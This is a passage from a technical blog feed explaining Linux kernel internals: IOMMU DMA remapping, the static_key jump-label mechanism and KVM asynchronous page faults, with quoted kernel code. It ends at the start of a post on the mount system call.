<li>Interrupt posting: this supports direct delivery of virtual interrupts from devfices and excternal interrupt controllers to virtual processors.</li>
</ul>
<p>qemu/kvm virtual machine now uses VFIO to do device assignment. VFIO utilizes IOMMU’s DMA remapping to do DMA in VM, but it doesn’t use interrupt remapping as it is not efficient compared with the irqfd in kernel IMO.</p>
<p>The basic idea of IOMMU DMA remapping is the same as the MMU for address translation.
When the physical IO device do DMA, the address for DMA is called IOVA, the IOMMU first using the device’s address(PCI BDF address) to find a page table then using the the IOVA to walk this page table and finally get the host physical address. This is very like that how the MMU work to translate a virtual address to a physical address. Following figure show the basic idea of DMA remapping, this is the legacy mode, there is also a scalable mode, though the detail differs, the idea is the same.</p>
<p><img src="/assets/img/iommu/3.png" alt="" /></p>
<p>The device’s bus is useds to index in Root Table, the root table is 4-KByte in size and contains 256 root-entries. The root-table-entry contains the context-table pointer which references the context-table for all the devices on the bus identified by the root-entry.</p>
<p>A context-entry maps a specific I/O device on a bus to the domain to which it is assigned, and, in
turn, to the address translation structures for the domain. Each context-table contains 256 entries,
with each entry corresponding to a PCI device function on the bus. For a PCI device, the device and
function numbers (lower 8-bits) are used to index into the context-table.</p>
<p>The root-table and context table is setup by the IOMMU driver, the page table is usually setup by the VMM. Of course, any process can do setup this page table. The IOVA is used as the input for the IOMMU translation, this address is device’s view address. The IOVA can be any address that is meaningfor for the guest or process. For example, the qemu/kvm uses the GPA as the IOVA and also you can uses another address as the IOVA. The VFIO uses IOMMU to do the translation from GPA to HPA.</p>
<p>Next I will write the code analysis of the intel IOMMU driver. Also I will write a post for the iommu hardware’s implementation as qemu implements the amd and intel iommu.</p>
Linux static_key internlas2019-07-20T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/07/20/linux-static-key-internals
<h3> static_key introduction </h3>
<p>There are often a situation that we need to check some switch to determine which code flow to be executed. In some cases the switch is almost the same (true or false), so the check may influence the performance. static_key and jump label let us do code patch in the address which we need to check. Using static_key, there is no check but just flat code flow. There are a lot of static_key usage introduction, but little internals introduction. This post is try to explain the static_key misc under the surface. This post uses kernel 4.4 as I just have this code in my hand now.</p>
<p>There are three aspects for static_key:</p>
<ol>
<li>We need to save the static_key information in the ELF file, these information is stored in the ‘__jump_table’ section in ELF file</li>
<li>The kernel need to parse these ‘__jump_table’ information</li>
<li>When we change the switch, the kernel need to update the patched code</li>
</ol>
<p>The idea of static_key is illustrated as following:</p>
<p><img src="/assets/img/static_key/1.png" alt="" /></p>
<p>Here in most situation the switch is the ‘most state’ so the red block is nop, this means the switch is in the ‘mostly’ state. When we change the state of the switch,the kernel will update the red block as a jump instruction so that the code can go to the ‘2’ code flow.</p>
<h3> Store static_key information in ELF file </h3>
<p>static_key is defined by a ‘struct static_key’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct static_key {
atomic_t enabled;
/* Set lsb bit to 1 if branch is default true, 0 ot */
struct jump_entry *entries;
#ifdef CONFIG_MODULES
struct static_key_mod *next;
#endif
};
</code></pre></div></div>
<p>The ‘enabled’ indicates the state of static_key, 0 means false and 1 means true. ‘entries’ contains the patching information of jump label, it is defined as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct jump_entry {
jump_label_t code;
jump_label_t target;
jump_label_t key;
};
</code></pre></div></div>
<p>code is the address of ‘patching’, target is where we should jump, and key is the address of static_key.</p>
<p>The ‘next’ field in static_key is used for modules reference the kernel image or other modules’ static_key.</p>
<p>Let’s use the ‘apic_sw_disabled’ in arch/x86/kvm/lapic.c as an example. It is defined as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct static_key_deferred apic_sw_disabled __read_mostly;
</code></pre></div></div>
<p>Here the ‘static_key_deferred’ is just a wrapper of static_key, it just contains a ‘timeout’ and a ‘delayed work’ to do the update using a delayed work.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct static_key_deferred {
struct static_key key;
unsigned long timeout;
struct delayed_work work;
};
</code></pre></div></div>
<p>‘apic_sw_disabled’ is used to determine whether the system software enables the local apic, in most cases, the software will enable this. So the default of ‘apic_sw_disabled’ is false. Notice, the ‘apic_sw_disabled’ is used for all of the vcpu. If any of the vcpu in the host disable the local apic, the ‘apic_sw_disabled’ will be true.</p>
<p>In ‘kvm_apic_sw_enabled’, it calls ‘static_key_false’ to determine ‘apic_sw_disabled.key’. The ‘static_key_false’ just calls ‘arch_static_branch’ and latter is as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static __always_inline bool arch_static_branch(struct static_key *key, bool branch)
{
asm_volatile_goto("1:"
".byte " __stringify(STATIC_KEY_INIT_NOP) "\n\t"
".pushsection __jump_table, \"aw\" \n\t"
_ASM_ALIGN "\n\t"
_ASM_PTR "1b, %l[l_yes], %c0 + %c1 \n\t"
".popsection \n\t"
: : "i" (key), "i" (branch) : : l_yes);
return false;
l_yes:
return true;
}
</code></pre></div></div>
<p>The ‘STATIC_KEY_INIT_NOP’ is ‘no-op instruction’ , it is ‘0x0f,0x1f,0x44,0x00,0’. This is the red block in the first pic. The data between ‘.pushsection’ and ‘.popsection’ will be in ‘__jump_table’ section. For every arch_static_branch call there are three unsigned long data in the ‘__jump_table’. The first unsigned long is the address of ‘1b’, this is the 5 ‘no-op instruction’s address. The second if the address of ‘l_yes’, and the third is the static_key’s address ored with the branch value(false for the static_key_false, and true for the static_key_true).</p>
<p>‘static_key_false’ and ‘arch_static_branch’ is always inline, so ‘kvm_apic_sw_enabled’ will be compiled as following asm instruction.</p>
<p><img src="/assets/img/static_key/2.png" alt="" /></p>
<p>Notice we have set the ‘kvm_apic_sw_enabled’ as noinline by adding ‘noline’ in the function signature.</p>
<p>As the ‘13f70’ line is no-op instruction, so this ‘kvm_apic_sw_enabled’ always return 1. This is right.</p>
<p>Also after ‘arch_static_branch’ is compiled, there are three unsigned long data in the ‘__jump_table’. It lays as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> |no-op address | target address | static_key's address ored with 0|
</code></pre></div></div>
<p>In this function it is:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> |13f79 | 13f85| kvm_apic_sw_enabled.key's address|
</code></pre></div></div>
<p>These three data is coressponding to the ‘jump_entry’, The kvm_apic_sw_enabled.key’s address is a global address.</p>
<p>Notice here ‘13f79’ is just the address of the kvm.ko file offset. In module loding, it will be reallocated.</p>
<h3> Parses '__jump_table' when startup </h3>
<p>In ‘start_kerne’ it calls ‘jump_label_init’ to parse the ‘__jump_table’. For modules, in ‘jump_label_init_module’ it register a module notifier named ‘jump_label_module_nb’, when a module loaded, it calls ‘jump_label_add_module’ to parse ‘__jump_table’. We will deep into the module case. ‘jump_label_add_module’s code is following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int jump_label_add_module(struct module *mod)
{
struct jump_entry *iter_start = mod->jump_entries;
struct jump_entry *iter_stop = iter_start + mod->num_jump_entries;
struct jump_entry *iter;
struct static_key *key = NULL;
struct static_key_mod *jlm;
/* if the module doesn't have jump label entries, just return */
if (iter_start == iter_stop)
return 0;
jump_label_sort_entries(iter_start, iter_stop);
for (iter = iter_start; iter < iter_stop; iter++) {
struct static_key *iterk;
iterk = jump_entry_key(iter);
if (iterk == key)
continue;
key = iterk;
if (within_module(iter->key, mod)) {
/*
* Set key->entries to iter, but preserve JUMP_LABEL_TRUE_BRANCH.
*/
*((unsigned long *)&key->entries) += (unsigned long)iter;
key->next = NULL;
continue;
}
...
}
return 0;
}
</code></pre></div></div>
<p>The ‘iter_start’ pointer the first of jump_entries and ‘iter_sopt’ pointer the end of jump_entries.
The jump entries is sorted by ‘jump_label_sort_entries’ function. We can get the function of one ‘static_key’ from ‘jump_entry’ entry by calling ‘jump_entry_key’ function. Notice the third of ‘jump_entry’ is the address of static_key ored with the 0 or 1. So ‘jump_entry_key’ clears the first bit.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static inline struct static_key *jump_entry_key(struct jump_entry *entry)
{
return (struct static_key *)((unsigned long)entry->key & ~1UL);
}
</code></pre></div></div>
<p>Later if the static_key is defined in this module, ‘jump_label_add_module’ sets this static_key’s entries to the address of ‘jump_entry’. If the static_key is defined in another, we need to uses the ‘next’ field in ‘static_key’ to record this.</p>
<p>After calling ‘jump_label_add_module’, the ‘static_key’ and ‘jump_entry’ has following relation.</p>
<p><img src="/assets/img/static_key/3.png" alt="" /></p>
<h4> patch the function </h4>
<p>Now the function ‘kvm_apic_sw_enabled’ return true, means the ‘apic_sw_disabled.key’ is false. However in some point we need to change the ‘apic_sw_disabled.key’ to true. For example in ‘kvm_create_lapic’, it has following statement:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static_key_slow_inc(&apic_sw_disabled.key);
</code></pre></div></div>
<p>This means when creating lapic, we need to set ‘apic_sw_disabled.key’ to true.</p>
<p>‘static_key_slow_inc’ calls ‘jump_label_update’ to patch the code, and also set ‘static_key’s enabled to 1.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void jump_label_update(struct static_key *key)
{
struct jump_entry *stop = __stop___jump_table;
struct jump_entry *entry = static_key_entries(key);
#ifdef CONFIG_MODULES
struct module *mod;
__jump_label_mod_update(key);
preempt_disable();
mod = __module_address((unsigned long)key);
if (mod)
stop = mod->jump_entries + mod->num_jump_entries;
preempt_enable();
#endif
/* if there are no users, entry can be NULL */
if (entry)
__jump_label_update(key, entry, stop);
}
</code></pre></div></div>
<p>‘jump_label_update’ get the ‘jump_entry’ from ‘static_key’s ‘entries’ field. The ‘stop’ is either ‘<strong>stop</strong>_jump_table’ or the ‘static_key’s module’s end of jump entries. Then call ‘__jump_label_update’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void __jump_label_update(struct static_key *key,
struct jump_entry *entry,
struct jump_entry *stop)
{
for (; (entry < stop) && (jump_entry_key(entry) == key); entry++) {
/*
* entry->code set to 0 invalidates module init text sections
* kernel_text_address() verifies we are not in core kernel
* init code, see jump_label_invalidate_module_init().
*/
if (entry->code && kernel_text_address(entry->code))
arch_jump_label_transform(entry, jump_label_type(entry));
}
}
</code></pre></div></div>
<p>After the check, this function calls ‘arch_jump_label_transform’, with the return value of ‘jump_label_type’. ‘jump_label_type’ function return the jump type, means we should use nop or jump.
There are two jump type in kernel 4.4, JUMP_LABEL_NOP with 0, and JUMP_LABEL_JMP with 1.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> enum jump_label_type {
JUMP_LABEL_NOP = 0,
JUMP_LABEL_JMP,
};
</code></pre></div></div>
<p>‘jump_label_type’</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static enum jump_label_type jump_label_type(struct jump_entry *entry)
{
struct static_key *key = jump_entry_key(entry);
bool enabled = static_key_enabled(key);
bool branch = jump_entry_branch(entry);
/* See the comment in linux/jump_label.h */
return enabled ^ branch;
}
</code></pre></div></div>
<p>Here the ‘enabled’ is -1(0xffffffff), this is set in ‘static_key_slow_inc’, the branch is the function used, here is 0(static_key_false), so ‘jump_label_type’ return 1.</p>
<p>‘arch_jump_label_transform’ calls ‘__jump_label_transform’ with the type(1, JUMP_LABEL_JMP), poker(NULL), and init(NULL). So the calling code will be:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void __jump_label_transform(struct jump_entry *entry,
enum jump_label_type type,
void *(*poker)(void *, const void *, size_t),
int init)
{
union jump_code_union code;
const unsigned char default_nop[] = { STATIC_KEY_INIT_NOP };
const unsigned char *ideal_nop = ideal_nops[NOP_ATOMIC5];
if (type == JUMP_LABEL_JMP) {
if (init) {
...
} else {
/*
* ...otherwise expect an ideal_nop. Otherwise
* something went horribly wrong.
*/
if (unlikely(memcmp((void *)entry->code, ideal_nop, 5)
!= 0))
bug_at((void *)entry->code, __LINE__);
}
code.jump = 0xe9;
code.offset = entry->target -
(entry->code + JUMP_LABEL_NOP_SIZE);
} else {
...
}
...
if (poker)
(*poker)((void *)entry->code, &code, JUMP_LABEL_NOP_SIZE);
else
text_poke_bp((void *)entry->code, &code, JUMP_LABEL_NOP_SIZE,
(void *)entry->code + JUMP_LABEL_NOP_SIZE);
}
</code></pre></div></div>
<p>The ‘code’ will contains the jump code, the first byte is ‘0xe9’, and later four bytes is the offset to jump. Finally, the ‘__jump_label_transform’ calls ‘text_poke_bp’ to write the ‘jump_entry->code’s 5 bytes as the jump to another branch. In ‘kvm_apic_sw_enabled’ function, it will return ‘apic->sw_enabled’. In ‘static_key_slow_inc’ after ‘jump_label_update’, it will set the ‘key->enabled’ to 1.</p>
<p>‘apic_sw_disabled.key’ is later reenabled by ‘static_key_slow_dec_deferred’ in ‘apic_set_spiv’. When we
The delayed work will call ‘__static_key_slow_dec’ finally, and it will decrease the ‘key->enabled’ and later ‘enabled ^ branch’ will be 0, so in ‘__jump_label_transform’ it will patch the code goto no-op instruction.</p>
<h3> Reference </h3>
<p>[1] <a href="https://github.com/torvalds/linux/blob/master/Documentation/static-keys.txt">kernel static_key doc</a></p>
<p>[2] <a href="https://github.com/linux-wmt/linux-vtwm/commit/fd4363fff3d96795d3feb1b3fb48ce590f186bdd">int3-based instruction patching</a></p>
KVM async page fault2019-03-24T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/03/24/kvm-async-page-fault
<h3> apf introduction </h3>
<p>The qemu/kvm VM’s physical memory is the virtual memory of qemu process. When the virtual memory of qemu has been commit and is setup with physical memory the host can swap out this physical memory. When the guest vcpu access memory swapped out by host its execution is suspended until memory is swapped back. Asynchronous page fault is a way to try and use guest vcpu more efficiently by allowing it to execute other tasks while page is brought back into memory[1]. Following give a summary of these processes.</p>
<ol>
<li>
<p>page fault when the EPT page table is not setup</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> 1. VMEXIT
2. kvm_mmu_page_fault()
3. gfn_to_pfn()
4. get_user_pages_unlocked()
no previously mapped page and no swap entry found
empty page is allocated
5. page is added into shadow/nested page table
</code></pre></div> </div>
</li>
<li>
<p>page fault when the physical memory is swapped out(without apf)</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> 1. VMEXIT
2. kvm_mmu_page_fault()
3. gfn_to_pfn()
4. get_user_pages_unlocked()
swap entry is found
page swap-in process is initiated
vcpu thread goes to sleep until page is swapped in
</code></pre></div> </div>
</li>
<li>
<p>page fault when the phycial memory is swapped out(with apf)</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> 1. VMEXIT
2. kvm_mmu_page_fault()
3. gfn_to_pfn()
4. get_user_pages_nowait()
5. gup is done by dedicated thread, inject 'page not present' exception to guest
6. guest puts process A(which caused this page fault) to sleep and schedule another process
7. page is swapped in, inject 'page ready' exception to guest
8. guest can schedule process A back to run on vcpu
</code></pre></div> </div>
</li>
</ol>
<p>Following shows the process of kvm async page fault process.[2]</p>
<p><img src="/assets/img/apf/1.jpg" alt="" /></p>
<p>From description we know that kvm apf need the guest do something, such as recognize the apf ‘page not present’ and ‘page ready’ exception, and also the para guest should hook the exception to process these two new exception. apf contains following steps.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> 1. the guest should be initialized to process the new exception
2. kvm page fault handler should recognize the swapped out case and initialize a work to swap in the page, inject a 'page not present' to guest
3. the guest receive this exception and schedule another process to run
4. when the page caused page fault in step 2 has been swapped in, the kvm inject a 'page ready' exception to guest
5. the guest can do schedule to run process that was blocked by page fault in step 2
</code></pre></div></div>
<p>Next part I will discuss the code in above process.</p>
<h3> detail of apf </h3>
<h4> para guest initialization when startup </h4>
<p>commit: <a href="https://git.kernel.org/pub/scm/virt/kvm/kvm.git/commit/?id=fd10cde9294f73eeccbc16f3fec1ae6cde7b800c">KVM paravirt: Add async PF initialization to PV guest.</a></p>
<p>Here we can see, the apf is enabled default and can be disabled with the ‘no-kvmapf’ parameter in kernel command line.</p>
<p>Every CPU has a per-cpu vairable named ‘apf_reason’, it is defined as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +struct kvm_vcpu_pv_apf_data {
+ __u32 reason;
+ __u8 pad[60];
+ __u32 enabled;
+};
</code></pre></div></div>
<p>The ‘reason’ here is the exception of apf, can be ‘KVM_PV_REASON_PAGE_NOT_PRESENT’(1) or ‘KVM_PV_REASON_PAGE_READY’(2), the ‘enabled’ indicates the status of apf. When</p>
<p>If the kvm support apf, the ‘KVM_CPUID_FEATURES’ cpuid leaf has ‘KVM_FEATURE_ASYNC_PF’ feature, When the guest detect this feature, it writes the ‘afp_reason’s physical address to msr ‘MSR_KVM_ASYNC_PF_EN’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +void __cpuinit kvm_guest_cpu_init(void)
+{
+ if (!kvm_para_available())
+ return;
+
+ if (kvm_para_has_feature(KVM_FEATURE_ASYNC_PF) && kvmapf) {
+ u64 pa = __pa(&__get_cpu_var(apf_reason));
+
+ wrmsrl(MSR_KVM_ASYNC_PF_EN, pa | KVM_ASYNC_PF_ENABLED);
+ __get_cpu_var(apf_reason).enabled = 1;
+ printk(KERN_INFO"KVM setup async PF for cpu %d\n",
+ smp_processor_id());
+ }
+}
</code></pre></div></div>
<h4> guest process the apf exception </h4>
<p>commit: <a href="https://git.kernel.org/pub/scm/virt/kvm/kvm.git/commit/?id=631bc4878220932fe67fc46fc7cf7cccdb1ec597">KVM: Handle async PF in a guest</a></p>
<p>In the initialization, it sets the trap_init to ‘kvm_apf_trap_init’, and in the later function it set the ‘14’ gate’s(page fault) handler to ‘async_page_fault’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +static void __init kvm_apf_trap_init(void)
+{
+ set_intr_gate(14, &async_page_fault);
+}
</code></pre></div></div>
<p>The ‘async_page_fault’ calls ‘do_async_page_fault’. The later function first read the ‘</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +u32 kvm_read_and_reset_pf_reason(void)
+{
+ u32 reason = 0;
+
+ if (__get_cpu_var(apf_reason).enabled) {
+ reason = __get_cpu_var(apf_reason).reason;
+ __get_cpu_var(apf_reason).reason = 0;
+ }
+
+ return reason;
+}
+dotraplinkage void __kprobes
+do_async_page_fault(struct pt_regs *regs, unsigned long error_code)
+{
+ switch (kvm_read_and_reset_pf_reason()) {
+ default:
+ do_page_fault(regs, error_code);
+ break;
+ case KVM_PV_REASON_PAGE_NOT_PRESENT:
+ /* page is swapped out by the host. */
+ kvm_async_pf_task_wait((u32)read_cr2());
+ break;
+ case KVM_PV_REASON_PAGE_READY:
+ kvm_async_pf_task_wake((u32)read_cr2());
+ break;
+ }
+}
+
</code></pre></div></div>
<p>The apf reason is writen to ‘apf_reason.reason’ field by kvm and the guest can read it out. When apf reason is ‘KVM_PV_REASON_PAGE_NOT_PRESENT’ it calls ‘kvm_async_pf_task_wait’ adds current process to a sleep list and reschedule. When the guest receive ‘KVM_PV_REASON_PAGE_READY’ it calls ‘kvm_async_pf_task_wake’ to wakeup the sleep process.</p>
<h4> kvm support the apf cpuid feature and msr</h4>
<p>commit: <a href="https://git.kernel.org/pub/scm/virt/kvm/kvm.git/commit/?id=344d9588a9df06182684168be4f1408b55c7da3e">KVM: Add PV MSR to enable asynchronous page faults delivery</a></p>
<p>As we discussed, the kvm should support the ‘KVM_FEATURE_ASYNC_PF’ cpuid and msr ‘MSR_KVM_ASYNC_PF_EN’.</p>
<p>When the guest write to msr ‘MSR_KVM_ASYNC_PF_EN’ the kvm module calls ‘kvm_pv_enable_async_pf’. In this function it saves the per-cpu variable ‘apf_reason’ to ‘vcpu’s arch field ‘apf.msr_val’. ‘kvm_gfn_to_hva_cache_init’ creates a ‘cache’ for gpa to hva so that the kvm can write data to guest more efficiently.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +static int kvm_pv_enable_async_pf(struct kvm_vcpu *vcpu, u64 data)
+{
+ gpa_t gpa = data & ~0x3f;
+
+ /* Bits 1:5 are resrved, Should be zero */
+ if (data & 0x3e)
+ return 1;
+
+ vcpu->arch.apf.msr_val = data;
+
+ if (!(data & KVM_ASYNC_PF_ENABLED)) {
+ kvm_clear_async_pf_completion_queue(vcpu);
+ kvm_async_pf_hash_reset(vcpu);
+ return 0;
+ }
+
+ if (kvm_gfn_to_hva_cache_init(vcpu->kvm, &vcpu->arch.apf.data, gpa))
+ return 1;
+
+ kvm_async_pf_wakeup_all(vcpu);
+ return 0;
+}
+
</code></pre></div></div>
<h4> kvm do the apf work </h4>
<p>There are two commit with this part.
commit: <a href="https://git.kernel.org/pub/scm/virt/kvm/kvm.git/commit/?id=af585b921e5d1e919947c4b1164b59507fe7cd7b">KVM: Halt vcpu if page it tries to access is swapped out</a> this commit setup the framework of apf.</p>
<p>commit: <a href="https://git.kernel.org/pub/scm/virt/kvm/kvm.git/commit/?id=7c90705bf2a373aa238661bdb6446f27299ef489">KVM: Inject asynchronous page fault into a PV guest if page is swapped out</a> this commit do the final work</p>
<p>Let’s first look at the first commit.</p>
<p>Every apf work is presented by the following structure.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +struct kvm_async_pf {
+ struct work_struct work;
+ struct list_head link;
+ struct list_head queue;
+ struct kvm_vcpu *vcpu;
+ struct mm_struct *mm;
+ gva_t gva;
+ unsigned long addr;
+ struct kvm_arch_async_pf arch;
+ struct page *page;
+ bool done;
+};
</code></pre></div></div>
<p>The apf occurs in page fault process, the function is ‘tdp_page_fault’. So this commit add the call to a new function ‘try_async_pf’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +static bool try_async_pf(struct kvm_vcpu *vcpu, gfn_t gfn, gva_t gva,
+ pfn_t *pfn)
+{
+ bool async;
+
+ *pfn = gfn_to_pfn_async(vcpu->kvm, gfn, &async);
+
+ if (!async)
+ return false; /* *pfn has correct page already */
+
+ put_page(pfn_to_page(*pfn));
+
+ if (can_do_async_pf(vcpu)) {
+ trace_kvm_try_async_get_page(async, *pfn);
+ if (kvm_find_async_pf_gfn(vcpu, gfn)) {
+ trace_kvm_async_pf_doublefault(gva, gfn);
+ kvm_make_request(KVM_REQ_APF_HALT, vcpu);
+ return true;
+ } else if (kvm_arch_setup_async_pf(vcpu, gva, gfn))
+ return true;
+ }
+
+ *pfn = gfn_to_pfn(vcpu->kvm, gfn);
+
+ return false;
+}
+int kvm_setup_async_pf(struct kvm_vcpu *vcpu, gva_t gva, gfn_t gfn,
+ struct kvm_arch_async_pf *arch)
+{
+ struct kvm_async_pf *work;
+
+ if (vcpu->async_pf.queued >= ASYNC_PF_PER_VCPU)
+ return 0;
+
+ /* setup delayed work */
+
+ /*
+ * do alloc nowait since if we are going to sleep anyway we
+ * may as well sleep faulting in page
+ */
+ work = kmem_cache_zalloc(async_pf_cache, GFP_NOWAIT);
+ if (!work)
+ return 0;
+
+ work->page = NULL;
+ work->done = false;
+ work->vcpu = vcpu;
+ work->gva = gva;
+ work->addr = gfn_to_hva(vcpu->kvm, gfn);
+ work->arch = *arch;
+ work->mm = current->mm;
+ atomic_inc(&work->mm->mm_count);
+ kvm_get_kvm(work->vcpu->kvm);
+
+ /* this can't really happen otherwise gfn_to_pfn_async
+ would succeed */
+ if (unlikely(kvm_is_error_hva(work->addr)))
+ goto retry_sync;
+
+ INIT_WORK(&work->work, async_pf_execute);
+ if (!schedule_work(&work->work))
+ goto retry_sync;
+
+ list_add_tail(&work->queue, &vcpu->async_pf.queue);
+ vcpu->async_pf.queued++;
+ kvm_arch_async_page_not_present(vcpu, work);
+ return 1;
+retry_sync:
+ kvm_put_kvm(work->vcpu->kvm);
+ mmdrop(work->mm);
+ kmem_cache_free(async_pf_cache, work);
+ return 0;
+}
</code></pre></div></div>
<p>If the kvm can do apf, it calls ‘kvm_setup_async_pf’(called by ‘kvm_arch_setup_async_pf’) to setup a ‘work queue’ and calls ‘kvm_arch_async_page_not_present’ to notify the guest. As this commit just setups the apf framework, the ‘kvm_arch_async_page_not_present’ doesn’t inject interrupt.</p>
<p>‘kvm_setup_async_pf’ initializes a ‘work_struct’ and its function is ‘async_pf_execute’. ‘async_pf_execute’ swaps in the fault page.</p>
<p>Then in the ‘__vcpu_run’ when the guest VMEXIT, it calls ‘kvm_check_async_pf_completion’ to check whether the apf work is done. This is the first version of apf, called ‘batch mechanism’. Commit <a href="https://git.kernel.org/pub/scm/virt/kvm/kvm.git/commit/?id=e0ead41a6dac09f86675ce07a66e4b253a9b7bd5">KVM: async_pf: Provide additional direct page notification</a> add a Config ‘KVM_ASYNC_PF_SYNC’. When this selected, the ‘kvm’ will notify the guest directly.</p>
<p>commit: <a href="https://git.kernel.org/pub/scm/virt/kvm/kvm.git/commit/?id=7c90705bf2a373aa238661bdb6446f27299ef489">KVM: Inject asynchronous page fault into a PV guest if page is swapped out</a> is easy to understand.</p>
<p>Following is the core, when the page not present, the kvm can halt the vcpu or inject ‘KVM_PV_REASON_PAGE_NOT_PRESENT’ to guest. When the async page is ready, the kvm inject ‘KVM_ASYNC_PF_ENABLED’ to guest.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> void kvm_arch_async_page_not_present(struct kvm_vcpu *vcpu,
struct kvm_async_pf *work)
{
- trace_kvm_async_pf_not_present(work->gva);
-
- kvm_make_request(KVM_REQ_APF_HALT, vcpu);
+ trace_kvm_async_pf_not_present(work->arch.token, work->gva);
kvm_add_async_pf_gfn(vcpu, work->arch.gfn);
+
+ if (!(vcpu->arch.apf.msr_val & KVM_ASYNC_PF_ENABLED) ||
+ kvm_x86_ops->get_cpl(vcpu) == 0)
+ kvm_make_request(KVM_REQ_APF_HALT, vcpu);
+ else if (!apf_put_user(vcpu, KVM_PV_REASON_PAGE_NOT_PRESENT)) {
+ vcpu->arch.fault.error_code = 0;
+ vcpu->arch.fault.address = work->arch.token;
+ kvm_inject_page_fault(vcpu);
+ }
}
void kvm_arch_async_page_present(struct kvm_vcpu *vcpu,
struct kvm_async_pf *work)
{
- trace_kvm_async_pf_ready(work->gva);
- kvm_del_async_pf_gfn(vcpu, work->arch.gfn);
+ trace_kvm_async_pf_ready(work->arch.token, work->gva);
+ if (is_error_page(work->page))
+ work->arch.token = ~0; /* broadcast wakeup */
+ else
+ kvm_del_async_pf_gfn(vcpu, work->arch.gfn);
+
+ if ((vcpu->arch.apf.msr_val & KVM_ASYNC_PF_ENABLED) &&
+ !apf_put_user(vcpu, KVM_PV_REASON_PAGE_READY)) {
+ vcpu->arch.fault.error_code = 0;
+ vcpu->arch.fault.address = work->arch.token;
+ kvm_inject_page_fault(vcpu);
+ }
+}
</code></pre></div></div>
<h3> Reference </h3>
<p>[1] <a href="https://www.linux-kvm.org/images/a/ac/2010-forum-Async-page-faults.pdf">Asynchronous page faults</a></p>
<p>[2] <a href="https://www.kernelnote.com/entry/kvmguestswap">从kvm场景下guest访问的内存被swap出去之后说起</a></p>
system call analysis: mount2019-02-23T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/02/23/linux-system-call-mount
<p>The data in disk is just raw bytes, the user need to access these data as file, so there shoud be a layer to abstract this. This is what file system does.</p>
<p>Linux supports a lot of file systems. There are kinds of file systems, for eaxmple ext2/3/4, xfs is for local storage, proc and sys are pseudo file systems and nfs is network file system.</p>
<p>Whenever we want to use a new storage, we need first make file system on it and then mount it in OS. After that, the user can access the data in the new storage.</p>
<p>This post is the onte for mount system call.
Following is the definition of mount system call:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #include <sys/mount.h>
int mount(const char *source, const char *target,
const char *filesystemtype, unsigned long mountflags,
const void *data);
</code></pre></div></div>
<p>The first argument ‘source’ often specifies a storage device’s pathname.
The second argument ‘target’ sepcifies the location the ‘source’ will be attached.
The ‘filesystemtype’ specifies file system name such as ‘ext4’, ‘xfs’, ‘iso9660’ and so on.
The final argument ‘data’ is interpreted by different filesystems.</p>
<p>mount syscall is defined in fs/namespace.c.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> SYSCALL_DEFINE5(mount, char __user *, dev_name, char __user *, dir_name,
char __user *, type, unsigned long, flags, void __user *, data)
{
int ret;
char *kernel_type;
char *kernel_dev;
unsigned long data_page;
kernel_type = copy_mount_string(type);
ret = PTR_ERR(kernel_type);
if (IS_ERR(kernel_type))
goto out_type;
kernel_dev = copy_mount_string(dev_name);
ret = PTR_ERR(kernel_dev);
if (IS_ERR(kernel_dev))
goto out_dev;
ret = copy_mount_options(data, &data_page);
if (ret < 0)
goto out_data;
ret = do_mount(kernel_dev, dir_name, kernel_type, flags,
(void *) data_page);
free_page(data_page);
out_data:
kfree(kernel_dev);
out_dev:
kfree(kernel_type);
out_type:
return ret;
}
</code></pre></div></div>
<p>Copy the userspace argument to kernel and then transfer the control to ‘do_mount’.</p>
<p>‘do_mount’ first get the ‘path’ struct of userspace specified directory path. struct ‘path’ contains ‘vfsmount’ and ‘dentry’ and is used to present a directory patch’s dentry.
Then ‘do_mount’ according to ‘flags’ value and call corresponding function, such as ‘do_remount’, ‘do_lookback’, ‘do_change_type’ and so on. The default call is ‘do_new_mount’. This add a new mount to a directory.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int do_new_mount(struct path *path, const char *fstype, int flags,
